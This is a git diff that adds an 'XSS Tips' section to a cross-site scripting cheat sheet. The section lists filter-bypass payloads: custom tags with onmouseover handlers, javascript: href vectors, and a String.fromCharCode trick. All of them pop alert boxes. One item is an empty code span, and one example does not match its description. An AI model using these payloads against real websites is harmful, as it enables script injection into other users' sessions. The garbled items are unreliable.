diff --git a/XSS.md b/XSS.md index 3dbddbf..cea6940 100644 --- a/XSS.md +++ b/XSS.md @@ -15,6 +15,31 @@ In other browsers other Content-Types can be used to execute arbitrary JS, check https://github.com/BlackFan/content-type-research/blob/master/XSS.md + +## XSS Tips +* If your input is placed in the following tags, you must first exit these tags: + * `` + * `<script>` + * `<textarea>` + * `<noscript>` + * `<style>` + +* Magic events - If all events and tags were closed, use personal tags for this purpose: + * `onmouseover` + * `onclick` + * `oncopy` + +For Example: `<mehdi onmouseover=alert(1)>Hello mehdi0x90</mehdi>` + +* One of the places that can be used for XSS is the href tag. Even if your input is encoded and you cannot get out of the tag: + * `href="javascript:alert(1)"` +* If the system does not allow quotes of any kind, you can `eval()` a fromCharCode in JavaScript to create any XSS vector you need: + * `<a href="javascript:alert(String.fromCharCode(88,83,83))">Click Me!</a>` +* Since XSS examples that use a javascript: directive inside an `<IMG` tag do not work on Firefox this approach uses decimal HTML character references as a workaround: + * `<a href="javascript:alert('XSS')">Click Me!</a>` + +----- + **xml Content Type** If the page is returnin a text/xml content-type it's possible to indicate a namespace and execute arbitrary JS @@ -27,8 +52,6 @@ If the page is returnin a text/xml content-type it's possible to indicate a name ``` - ------ **Injecting inside raw HTML** ```javascript